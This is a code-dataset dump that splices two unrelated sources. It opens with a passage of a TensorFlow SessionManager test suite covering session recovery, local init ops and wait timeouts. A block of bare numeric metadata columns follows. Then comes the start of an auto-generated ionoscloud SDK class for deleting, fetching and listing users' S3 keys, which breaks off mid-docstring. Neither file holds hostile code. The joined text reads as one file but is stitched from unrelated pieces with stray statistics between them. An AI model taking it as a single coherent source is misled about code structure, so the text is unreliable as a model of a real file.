self.assertEquals(1, sess.run(v))
def testWaitForSessionReturnsNoneAfterTimeout(self):
with tf.Graph().as_default():
tf.Variable(1, name="v")
sm = tf.train.SessionManager(ready_op=tf.report_uninitialized_variables(),
recovery_wait_secs=1)
# Set max_wait_secs to allow us to try a few times.
with self.assertRaises(errors.DeadlineExceededError):
sm.wait_for_session(master="", max_wait_secs=3)
def testInitWithNoneLocalInitOpError(self):
# Creating a SessionManager with a None local_init_op but
# non-None ready_for_local_init_op raises ValueError
with self.assertRaisesRegexp(ValueError,
"If you pass a ready_for_local_init_op "
"you must also pass a local_init_op "):
tf.train.SessionManager(
ready_for_local_init_op=tf.report_uninitialized_variables(
tf.all_variables()),
local_init_op=None)
def testRecoverSessionWithReadyForLocalInitOp(self):
# Create a checkpoint.
checkpoint_dir = os.path.join(self.get_temp_dir(),
"recover_session_ready_for_local_init")
try:
gfile.DeleteRecursively(checkpoint_dir)
except OSError:
pass # Ignore
gfile.MakeDirs(checkpoint_dir)
with tf.Graph().as_default():
v = tf.Variable(1, name="v")
sm = tf.train.SessionManager(ready_op=tf.report_uninitialized_variables())
saver = tf.train.Saver({"v": v})
sess, initialized = sm.recover_session(
"", saver=saver, checkpoint_dir=checkpoint_dir)
self.assertFalse(initialized)
sess.run(v.initializer)
self.assertEquals(1, sess.run(v))
saver.save(sess, os.path.join(checkpoint_dir,
"recover_session_checkpoint"))
# Create a new Graph and SessionManager and recover.
with tf.Graph().as_default():
v = tf.Variable(2, name="v")
w = tf.Variable(
v,
trainable=False,
collections=[tf.GraphKeys.LOCAL_VARIABLES],
name="w")
with self.test_session():
self.assertEqual(False, tf.is_variable_initialized(v).eval())
self.assertEqual(False, tf.is_variable_initialized(w).eval())
sm2 = tf.train.SessionManager(
ready_op=tf.report_uninitialized_variables(),
ready_for_local_init_op=tf.report_uninitialized_variables(
tf.all_variables()),
local_init_op=w.initializer)
saver = tf.train.Saver({"v": v})
sess, initialized = sm2.recover_session(
"", saver=saver, checkpoint_dir=checkpoint_dir)
self.assertTrue(initialized)
self.assertEqual(
True,
tf.is_variable_initialized(sess.graph.get_tensor_by_name("v:0")).eval(
session=sess))
self.assertEqual(
True,
tf.is_variable_initialized(sess.graph.get_tensor_by_name("w:0")).eval(
session=sess))
self.assertEquals(1, sess.run(v))
self.assertEquals(1, sess.run(w))
def testRecoverSessionWithReadyForLocalInitOpFailsToReadyLocal(self):
# We use ready_for_local_init_op=tf.report_uninitialized_variables(),
# which causes recover_session to not run local_init_op, and to return
# initialized=False
# Create a checkpoint.
checkpoint_dir = os.path.join(
self.get_temp_dir(),
"recover_session_ready_for_local_init_fails_to_ready_local")
try:
gfile.DeleteRecursively(checkpoint_dir)
except OSError:
pass # Ignore
gfile.MakeDirs(checkpoint_dir)
with tf.Graph().as_default():
v = tf.Variable(1, name="v")
sm = tf.train.SessionManager(ready_op=tf.report_uninitialized_variables())
saver = tf.train.Saver({"v": v})
sess, initialized = sm.recover_session(
"", saver=saver, checkpoint_dir=checkpoint_dir)
self.assertFalse(initialized)
sess.run(v.initializer)
self.assertEquals(1, sess.run(v))
saver.save(sess, os.path.join(checkpoint_dir,
"recover_session_checkpoint"))
# Create a new Graph and SessionManager and recover.
with tf.Graph().as_default():
v = tf.Variable(2, name="v")
w = tf.Variable(
v,
trainable=False,
collections=[tf.GraphKeys.LOCAL_VARIABLES],
name="w")
with self.test_session():
self.assertEqual(False, tf.is_variable_initialized(v).eval())
self.assertEqual(False, tf.is_variable_initialized(w).eval())
sm2 = tf.train.SessionManager(
ready_op=tf.report_uninitialized_variables(),
ready_for_local_init_op=tf.report_uninitialized_variables(),
local_init_op=w.initializer)
saver = tf.train.Saver({"v": v})
sess, initialized = sm2.recover_session(
"", saver=saver, checkpoint_dir=checkpoint_dir)
self.assertFalse(initialized)
self.assertEqual(
True,
tf.is_variable_initialized(sess.graph.get_tensor_by_name("v:0")).eval(
session=sess))
self.assertEqual(
False,
tf.is_variable_initialized(sess.graph.get_tensor_by_name("w:0")).eval(
session=sess))
self.assertEquals(1, sess.run(v))
def testRecoverSessionNoChkptStillRunsLocalInitOp(self):
# This test checks for backwards compatibility.
# In particular, we continue to ensure that recover_session will execute
# local_init_op exactly once, regardless of whether the session was
# successfully recovered.
with tf.Graph().as_default():
w = tf.Variable(
1,
trainable=False,
collections=[tf.GraphKeys.LOCAL_VARIABLES],
name="w")
with self.test_session():
self.assertEqual(False, tf.is_variable_initialized(w).eval())
sm2 = tf.train.SessionManager(
ready_op=tf.report_uninitialized_variables(),
ready_for_local_init_op=None,
local_init_op=w.initializer)
# Try to recover session from None
sess, initialized = sm2.recover_session(
"", saver=None, checkpoint_dir=None)
# Succeeds because recover_session still run local_init_op
self.assertFalse(initialized)
self.assertEqual(
True,
tf.is_variable_initialized(sess.graph.get_tensor_by_name("w:0")).eval(
session=sess))
self.assertEquals(1, sess.run(w))
def testRecoverSessionFailsStillRunsLocalInitOp(self):
# Create a checkpoint.
checkpoint_dir = os.path.join(
self.get_temp_dir(),
"recover_session_ready_for_local_init_fails_stil_run")
try:
gfile.DeleteRecursively(checkpoint_dir)
except OSError:
pass # Ignore
gfile.MakeDirs(checkpoint_dir)
# Create a new Graph and SessionManager and recover.
with tf.Graph().as_default():
v = tf.Variable(2, name="v")
w = tf.Variable(
1,
trainable=False,
collections=[tf.GraphKeys.LOCAL_VARIABLES],
name="w")
with self.test_session():
self.assertEqual(False, tf.is_variable_initialized(v).eval())
self.assertEqual(False, tf.is_variable_initialized(w).eval())
sm2 = tf.train.SessionManager(
ready_op=tf.report_uninitialized_variables(),
ready_for_local_init_op=None,
local_init_op=w.initializer)
saver = tf.train.Saver({"v": v})
sess, initialized = sm2.recover_session(
"",
saver=saver,
checkpoint_dir=checkpoint_dir,
wait_for_checkpoint=False)
self.assertFalse(initialized)
self.assertEqual(
False,
tf.is_variable_initialized(sess.graph.get_tensor_by_name("v:0")).eval(
session=sess))
self.assertEqual(
True,
tf.is_variable_initialized(sess.graph.get_tensor_by_name("w:0")).eval(
session=sess))
self.assertEquals(1, sess.run(w))
def testWaitForSessionLocalInit(self):
server = tf.train.Server.create_local_server()
with tf.Graph().as_default() as graph:
v = tf.Variable(1, name="v")
w = tf.Variable(
v,
trainable=False,
collections=[tf.GraphKeys.LOCAL_VARIABLES],
name="w")
sm = tf.train.SessionManager(
graph=graph,
ready_op=tf.report_uninitialized_variables(),
ready_for_local_init_op=tf.report_uninitialized_variables(
tf.all_variables()),
local_init_op=w.initializer)
# Initialize v but not w
s = tf.Session(server.target, graph=graph)
s.run(v.initializer)
sess = sm.wait_for_session(server.target, max_wait_secs=3)
self.assertEqual(
True,
tf.is_variable_initialized(sess.graph.get_tensor_by_name("v:0")).eval(
session=sess))
self.assertEqual(
True,
tf.is_variable_initialized(sess.graph.get_tensor_by_name("w:0")).eval(
session=sess))
self.assertEquals(1, sess.run(v))
self.assertEquals(1, sess.run(w))
def testWaitForSessionWithReadyForLocalInitOpFailsToReadyLocal(self):
with tf.Graph().as_default() as graph:
v = tf.Variable(1, name="v")
w = tf.Variable(
v,
trainable=False,
collections=[tf.GraphKeys.LOCAL_VARIABLES],
name="w")
sm = tf.train.SessionManager(
graph=graph,
ready_op=tf.report_uninitialized_variables(),
ready_for_local_init_op=tf.report_uninitialized_variables(),
local_init_op=w.initializer)
with self.assertRaises(tf.errors.DeadlineExceededError):
# Time-out because w fails to be initialized,
# because of overly restrictive ready_for_local_init_op
sm.wait_for_session("", max_wait_secs=3)
def testWaitForSessionInsufficientReadyForLocalInitCheck(self):
with tf.Graph().as_default() as graph:
v = tf.Variable(1, name="v")
w = tf.Variable(
v,
trainable=False,
collections=[tf.GraphKeys.LOCAL_VARIABLES],
name="w")
sm = tf.train.SessionManager(
graph=graph,
ready_op=tf.report_uninitialized_variables(),
ready_for_local_init_op=None,
local_init_op=w.initializer)
with self.assertRaisesRegexp(tf.errors.FailedPreconditionError,
"Attempting to use uninitialized value v"):
sm.wait_for_session("", max_wait_secs=3)
def testPrepareSessionWithReadyForLocalInitOp(self):
with tf.Graph().as_default():
v = tf.Variable(1, name="v")
w = tf.Variable(
v,
trainable=False,
collections=[tf.GraphKeys.LOCAL_VARIABLES],
name="w")
with self.test_session():
self.assertEqual(False, tf.is_variable_initialized(v).eval())
self.assertEqual(False, tf.is_variable_initialized(w).eval())
sm2 = tf.train.SessionManager(
ready_op=tf.report_uninitialized_variables(),
ready_for_local_init_op=tf.report_uninitialized_variables(
tf.all_variables()),
local_init_op=w.initializer)
sess = sm2.prepare_session("", init_op=v.initializer)
self.assertEqual(
True,
tf.is_variable_initialized(sess.graph.get_tensor_by_name("v:0")).eval(
session=sess))
self.assertEqual(
True,
tf.is_variable_initialized(sess.graph.get_tensor_by_name("w:0")).eval(
session=sess))
self.assertEquals(1, sess.run(v))
self.assertEquals(1, sess.run(w))
def testPrepareSessionDidNotInitLocalVariable(self):
with tf.Graph().as_default():
v = tf.Variable(1, name="v")
w = tf.Variable(
v,
trainable=False,
collections=[tf.GraphKeys.LOCAL_VARIABLES],
name="w")
with self.test_session():
self.assertEqual(False, tf.is_variable_initialized(v).eval())
self.assertEqual(False, tf.is_variable_initialized(w).eval())
sm2 = tf.train.SessionManager(
ready_op=tf.report_uninitialized_variables())
with self.assertRaisesRegexp(RuntimeError,
"Init operations did not make model ready"):
sm2.prepare_session("", init_op=v.initializer)
def testPrepareSessionWithReadyNotReadyForLocal(self):
with tf.Graph().as_default():
v = tf.Variable(1, name="v")
w = tf.Variable(
v,
trainable=False,
collections=[tf.GraphKeys.LOCAL_VARIABLES],
name="w")
with self.test_session():
self.assertEqual(False, tf.is_variable_initialized(v).eval())
self.assertEqual(False, tf.is_variable_initialized(w).eval())
sm2 = tf.train.SessionManager(
ready_op=tf.report_uninitialized_variables(),
ready_for_local_init_op=tf.report_uninitialized_variables(
tf.all_variables()),
local_init_op=w.initializer)
with self.assertRaisesRegexp(
RuntimeError,
"Init operations did not make model ready for local_init"):
sm2.prepare_session("", init_op=None)
def testPrepareSessionWithInsufficientReadyForLocalInitCheck(self):
with tf.Graph().as_default():
v = tf.Variable(1, name="v")
w = tf.Variable(
v,
trainable=False,
collections=[tf.GraphKeys.LOCAL_VARIABLES],
name="w")
with self.test_session():
self.assertEqual(False, tf.is_variable_initialized(v).eval())
self.assertEqual(False, tf.is_variable_initialized(w).eval())
sm2 = tf.train.SessionManager(
ready_op=tf.report_uninitialized_variables(),
ready_for_local_init_op=None,
local_init_op=w.initializer)
with self.assertRaisesRegexp(tf.errors.FailedPreconditionError,
"Attempting to use uninitialized value v"):
sm2.prepare_session("", init_op=None)
class ObsoleteSessionManagerTest(tf.test.TestCase):
def testPrepareSessionSucceeds(self):
with tf.Graph().as_default():
v = tf.Variable([1.0, 2.0, 3.0], name="v")
sm = tf.train.SessionManager(ready_op=tf.assert_variables_initialized())
sess = sm.prepare_session("", init_op=tf.initialize_all_variables())
self.assertAllClose([1.0, 2.0, 3.0], sess.run(v))
def testPrepareSessionSucceedsWithInitFeedDict(self):
with tf.Graph().as_default():
p = tf.placeholder(tf.float32, shape=(3,))
v = tf.Variable(p, name="v")
sm = tf.train.SessionManager(ready_op=tf.assert_variables_initialized())
sess = sm.prepare_session("",
init_op=tf.initialize_all_variables(),
init_feed_dict={p: [1.0, 2.0, 3.0]})
self.assertAllClose([1.0, 2.0, 3.0], sess.run(v))
def testPrepareSessionSucceedsWithInitFn(self):
with tf.Graph().as_default():
v = tf.Variable([125], name="v")
sm = tf.train.SessionManager(ready_op=tf.assert_variables_initialized())
sess = sm.prepare_session("",
init_fn=lambda sess: sess.run(v.initializer))
self.assertAllClose([125], sess.run(v))
def testPrepareSessionFails(self):
checkpoint_dir = os.path.join(self.get_temp_dir(), "prepare_session")
checkpoint_dir2 = os.path.join(self.get_temp_dir(), "prepare_session2")
try:
gfile.DeleteRecursively(checkpoint_dir)
gfile.DeleteRecursively(checkpoint_dir2)
except OSError:
pass # Ignore
gfile.MakeDirs(checkpoint_dir)
with tf.Graph().as_default():
v = tf.Variable([1.0, 2.0, 3.0], name="v")
sm = tf.train.SessionManager(ready_op=tf.assert_variables_initialized())
saver = tf.train.Saver({"v": v})
sess = sm.prepare_session("", init_op=tf.initialize_all_variables(),
saver=saver, checkpoint_dir=checkpoint_dir)
self.assertAllClose([1.0, 2.0, 3.0], sess.run(v))
checkpoint_filename = os.path.join(checkpoint_dir,
"prepare_session_checkpoint")
saver.save(sess, checkpoint_filename)
# Create a new Graph and SessionManager and recover.
with tf.Graph().as_default():
# Renames the checkpoint directory.
os.rename(checkpoint_dir, checkpoint_dir2)
gfile.MakeDirs(checkpoint_dir)
v = tf.Variable([6.0, 7.0, 8.0], name="v")
with self.test_session():
self.assertEqual(False, tf.is_variable_initialized(v).eval())
tf.train.SessionManager(ready_op=tf.assert_variables_initialized())
saver = tf.train.Saver({"v": v})
# This should fail as there's no checkpoint within 2 seconds.
with self.assertRaisesRegexp(
RuntimeError, "no init_op or init_fn or local_init_op was given"):
sess = sm.prepare_session("", init_op=None, saver=saver,
checkpoint_dir=checkpoint_dir,
wait_for_checkpoint=True, max_wait_secs=2)
# Rename the checkpoint directory back.
gfile.DeleteRecursively(checkpoint_dir)
os.rename(checkpoint_dir2, checkpoint_dir)
# This should succeed as there's checkpoint.
sess = sm.prepare_session("", init_op=None, saver=saver,
checkpoint_dir=checkpoint_dir,
wait_for_checkpoint=True, max_wait_secs=2)
self.assertEqual(
True, tf.is_variable_initialized(
sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
def testRecoverSession(self):
# Create a checkpoint.
checkpoint_dir = os.path.join(self.get_temp_dir(), "recover_session")
try:
gfile.DeleteRecursively(checkpoint_dir)
except OSError:
pass # Ignore
gfile.MakeDirs(checkpoint_dir)
with tf.Graph().as_default():
v = tf.Variable(1, name="v")
sm = tf.train.SessionManager(ready_op=tf.assert_variables_initialized())
saver = tf.train.Saver({"v": v})
sess, initialized = sm.recover_session("", saver=saver,
checkpoint_dir=checkpoint_dir)
self.assertFalse(initialized)
sess.run(v.initializer)
self.assertEquals(1, sess.run(v))
saver.save(sess, os.path.join(checkpoint_dir,
"recover_session_checkpoint"))
# Create a new Graph and SessionManager and recover.
with tf.Graph().as_default():
v = tf.Variable(2, name="v")
with self.test_session():
self.assertEqual(False, tf.is_variable_initialized(v).eval())
sm2 = tf.train.SessionManager(ready_op=tf.assert_variables_initialized())
saver = tf.train.Saver({"v": v})
sess, initialized = sm2.recover_session("", saver=saver,
checkpoint_dir=checkpoint_dir)
self.assertTrue(initialized)
self.assertEqual(
True, tf.is_variable_initialized(
sess.graph.get_tensor_by_name("v:0")).eval(session=sess))
self.assertEquals(1, sess.run(v))
def testWaitForSessionReturnsNoneAfterTimeout(self):
with tf.Graph().as_default():
tf.Variable(1, name="v")
sm = tf.train.SessionManager(ready_op=tf.assert_variables_initialized(),
recovery_wait_secs=1)
# Set max_wait_secs to allow us to try a few times.
with self.assertRaises(errors.DeadlineExceededError):
sm.wait_for_session(master="", max_wait_secs=3)
if __name__ == "__main__":
tf.test.main()
| 41.879479
| 80
| 0.64109
| 3,076
| 25,714
| 5.150845
| 0.08225
| 0.054153
| 0.025751
| 0.049356
| 0.866511
| 0.859821
| 0.854077
| 0.849659
| 0.849154
| 0.841075
| 0
| 0.010453
| 0.244731
| 25,714
| 613
| 81
| 41.947798
| 0.805365
| 0.090534
| 0
| 0.899029
| 0
| 0
| 0.035972
| 0.013848
| 0
| 0
| 0
| 0
| 0.165049
| 1
| 0.046602
| false
| 0.017476
| 0.013592
| 0
| 0.064078
| 0.001942
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e873ce1eee6bad3cefbb43023792e0a1d5ae97dd
| 56,915
|
py
|
Python
|
ionoscloud/api/user_s3_keys_api.py
|
ionos-cloud/ionos-cloud-sdk-python
|
3c5804697c262898e6f6a438dc40e1b45a4bb5c9
|
[
"Apache-2.0"
] | null | null | null |
ionoscloud/api/user_s3_keys_api.py
|
ionos-cloud/ionos-cloud-sdk-python
|
3c5804697c262898e6f6a438dc40e1b45a4bb5c9
|
[
"Apache-2.0"
] | null | null | null |
ionoscloud/api/user_s3_keys_api.py
|
ionos-cloud/ionos-cloud-sdk-python
|
3c5804697c262898e6f6a438dc40e1b45a4bb5c9
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import absolute_import
import re # noqa: F401
import six
from ionoscloud.api_client import ApiClient
from ionoscloud.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class UserS3KeysApi(object):
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def um_users_s3keys_delete(self, user_id, key_id, **kwargs): # noqa: E501
"""Delete S3 keys # noqa: E501
Delete the specified user S3 key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.um_users_s3keys_delete(user_id, key_id, async_req=True)
>>> result = thread.get()
:param user_id: The unique ID of the user. (required)
:type user_id: str
:param key_id: The unique ID of the S3 key. (required)
:type key_id: str
:param pretty: Controls whether the response is pretty-printed (with indentations and new lines).
:type pretty: bool
:param depth: Controls the detail depth of the response objects. GET /datacenters/[ID] - depth=0: Only direct properties are included; children (servers and other elements) are not included. - depth=1: Direct properties and children references are included. - depth=2: Direct properties and children properties are included. - depth=3: Direct properties and children properties and children's children are included. - depth=... and so on
:type depth: int
:param x_contract_number: Users with multiple contracts must provide the contract number, for which all API requests are to be executed.
:type x_contract_number: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.um_users_s3keys_delete_with_http_info(user_id, key_id, **kwargs) # noqa: E501
def um_users_s3keys_delete_with_http_info(self, user_id, key_id, **kwargs): # noqa: E501
"""Delete S3 keys # noqa: E501
Delete the specified user S3 key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.um_users_s3keys_delete_with_http_info(user_id, key_id, async_req=True)
>>> result = thread.get()
:param user_id: The unique ID of the user. (required)
:type user_id: str
:param key_id: The unique ID of the S3 key. (required)
:type key_id: str
:param pretty: Controls whether the response is pretty-printed (with indentations and new lines).
:type pretty: bool
:param depth: Controls the detail depth of the response objects. GET /datacenters/[ID] - depth=0: Only direct properties are included; children (servers and other elements) are not included. - depth=1: Direct properties and children references are included. - depth=2: Direct properties and children properties are included. - depth=3: Direct properties and children properties and children's children are included. - depth=... and so on
:type depth: int
:param x_contract_number: Users with multiple contracts must provide the contract number, for which all API requests are to be executed.
:type x_contract_number: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
local_var_params = locals()
all_params = [
'user_id',
'key_id',
'pretty',
'depth',
'x_contract_number'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth',
'response_type',
'query_params'
]
)
for local_var_params_key, local_var_params_val in six.iteritems(local_var_params['kwargs']):
if local_var_params_key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method um_users_s3keys_delete" % local_var_params_key
)
local_var_params[local_var_params_key] = local_var_params_val
del local_var_params['kwargs']
# verify the required parameter 'user_id' is set
if self.api_client.client_side_validation and ('user_id' not in local_var_params or # noqa: E501
local_var_params['user_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `user_id` when calling `um_users_s3keys_delete`") # noqa: E501
# verify the required parameter 'key_id' is set
if self.api_client.client_side_validation and ('key_id' not in local_var_params or # noqa: E501
local_var_params['key_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `key_id` when calling `um_users_s3keys_delete`") # noqa: E501
if self.api_client.client_side_validation and 'depth' in local_var_params and local_var_params['depth'] > 10: # noqa: E501
raise ApiValueError("Invalid value for parameter `depth` when calling `um_users_s3keys_delete`, must be a value less than or equal to `10`") # noqa: E501
if self.api_client.client_side_validation and 'depth' in local_var_params and local_var_params['depth'] < 0: # noqa: E501
raise ApiValueError("Invalid value for parameter `depth` when calling `um_users_s3keys_delete`, must be a value greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'user_id' in local_var_params:
path_params['userId'] = local_var_params['user_id'] # noqa: E501
if 'key_id' in local_var_params:
path_params['keyId'] = local_var_params['key_id'] # noqa: E501
query_params = list(local_var_params.get('query_params', {}).items())
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'depth' in local_var_params and local_var_params['depth'] is not None: # noqa: E501
query_params.append(('depth', local_var_params['depth'])) # noqa: E501
header_params = {}
if 'x_contract_number' in local_var_params:
header_params['X-Contract-Number'] = local_var_params['x_contract_number'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Basic Authentication', 'Token Authentication'] # noqa: E501
response_type = None
if 'response_type' in kwargs:
response_type = kwargs['response_type']
return self.api_client.call_api(
'/um/users/{userId}/s3keys/{keyId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=response_type, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def um_users_s3keys_find_by_key_id(self, user_id, key_id, **kwargs): # noqa: E501
"""Retrieve user S3 keys by key ID # noqa: E501
Retrieve the specified user S3 key. The user ID is in the response body when the user is created, and in the list of the users, returned by GET. The key ID is in the response body when the S3 key is created, and in the list of all user S3 keys, returned by GET. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.um_users_s3keys_find_by_key_id(user_id, key_id, async_req=True)
>>> result = thread.get()
:param user_id: The unique ID of the user. (required)
:type user_id: str
:param key_id: The unique ID of the S3 key. (required)
:type key_id: str
:param pretty: Controls whether the response is pretty-printed (with indentations and new lines).
:type pretty: bool
:param depth: Controls the detail depth of the response objects. GET /datacenters/[ID] - depth=0: Only direct properties are included; children (servers and other elements) are not included. - depth=1: Direct properties and children references are included. - depth=2: Direct properties and children properties are included. - depth=3: Direct properties and children properties and children's children are included. - depth=... and so on
:type depth: int
:param x_contract_number: Users with multiple contracts must provide the contract number, for which all API requests are to be executed.
:type x_contract_number: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: S3Key
"""
kwargs['_return_http_data_only'] = True
return self.um_users_s3keys_find_by_key_id_with_http_info(user_id, key_id, **kwargs) # noqa: E501
def um_users_s3keys_find_by_key_id_with_http_info(self, user_id, key_id, **kwargs): # noqa: E501
"""Retrieve user S3 keys by key ID # noqa: E501
Retrieve the specified user S3 key. The user ID is in the response body when the user is created, and in the list of the users, returned by GET. The key ID is in the response body when the S3 key is created, and in the list of all user S3 keys, returned by GET. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.um_users_s3keys_find_by_key_id_with_http_info(user_id, key_id, async_req=True)
>>> result = thread.get()
:param user_id: The unique ID of the user. (required)
:type user_id: str
:param key_id: The unique ID of the S3 key. (required)
:type key_id: str
:param pretty: Controls whether the response is pretty-printed (with indentations and new lines).
:type pretty: bool
:param depth: Controls the detail depth of the response objects. GET /datacenters/[ID] - depth=0: Only direct properties are included; children (servers and other elements) are not included. - depth=1: Direct properties and children references are included. - depth=2: Direct properties and children properties are included. - depth=3: Direct properties and children properties and children's children are included. - depth=... and so on
:type depth: int
:param x_contract_number: Users with multiple contracts must provide the contract number, for which all API requests are to be executed.
:type x_contract_number: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(S3Key, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'user_id',
'key_id',
'pretty',
'depth',
'x_contract_number'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth',
'response_type',
'query_params'
]
)
for local_var_params_key, local_var_params_val in six.iteritems(local_var_params['kwargs']):
if local_var_params_key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method um_users_s3keys_find_by_key_id" % local_var_params_key
)
local_var_params[local_var_params_key] = local_var_params_val
del local_var_params['kwargs']
# verify the required parameter 'user_id' is set
if self.api_client.client_side_validation and ('user_id' not in local_var_params or # noqa: E501
local_var_params['user_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `user_id` when calling `um_users_s3keys_find_by_key_id`") # noqa: E501
# verify the required parameter 'key_id' is set
if self.api_client.client_side_validation and ('key_id' not in local_var_params or # noqa: E501
local_var_params['key_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `key_id` when calling `um_users_s3keys_find_by_key_id`") # noqa: E501
if self.api_client.client_side_validation and 'depth' in local_var_params and local_var_params['depth'] > 10: # noqa: E501
raise ApiValueError("Invalid value for parameter `depth` when calling `um_users_s3keys_find_by_key_id`, must be a value less than or equal to `10`") # noqa: E501
if self.api_client.client_side_validation and 'depth' in local_var_params and local_var_params['depth'] < 0: # noqa: E501
raise ApiValueError("Invalid value for parameter `depth` when calling `um_users_s3keys_find_by_key_id`, must be a value greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'user_id' in local_var_params:
path_params['userId'] = local_var_params['user_id'] # noqa: E501
if 'key_id' in local_var_params:
path_params['keyId'] = local_var_params['key_id'] # noqa: E501
query_params = list(local_var_params.get('query_params', {}).items())
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'depth' in local_var_params and local_var_params['depth'] is not None: # noqa: E501
query_params.append(('depth', local_var_params['depth'])) # noqa: E501
header_params = {}
if 'x_contract_number' in local_var_params:
header_params['X-Contract-Number'] = local_var_params['x_contract_number'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Basic Authentication', 'Token Authentication'] # noqa: E501
response_type = 'S3Key'
if 'response_type' in kwargs:
response_type = kwargs['response_type']
return self.api_client.call_api(
'/um/users/{userId}/s3keys/{keyId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=response_type, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def um_users_s3keys_get(self, user_id, **kwargs): # noqa: E501
"""List user S3 keys # noqa: E501
List S3 keys by user ID. The user ID is in the response body when the user is created, and in the list of the users, returned by GET. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.um_users_s3keys_get(user_id, async_req=True)
>>> result = thread.get()
:param user_id: The unique ID of the user. (required)
:type user_id: str
:param pretty: Controls whether the response is pretty-printed (with indentations and new lines).
:type pretty: bool
:param depth: Controls the detail depth of the response objects. GET /datacenters/[ID] - depth=0: Only direct properties are included; children (servers and other elements) are not included. - depth=1: Direct properties and children references are included. - depth=2: Direct properties and children properties are included. - depth=3: Direct properties and children properties and children's children are included. - depth=... and so on
:type depth: int
:param x_contract_number: Users with multiple contracts must provide the contract number, for which all API requests are to be executed.
:type x_contract_number: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
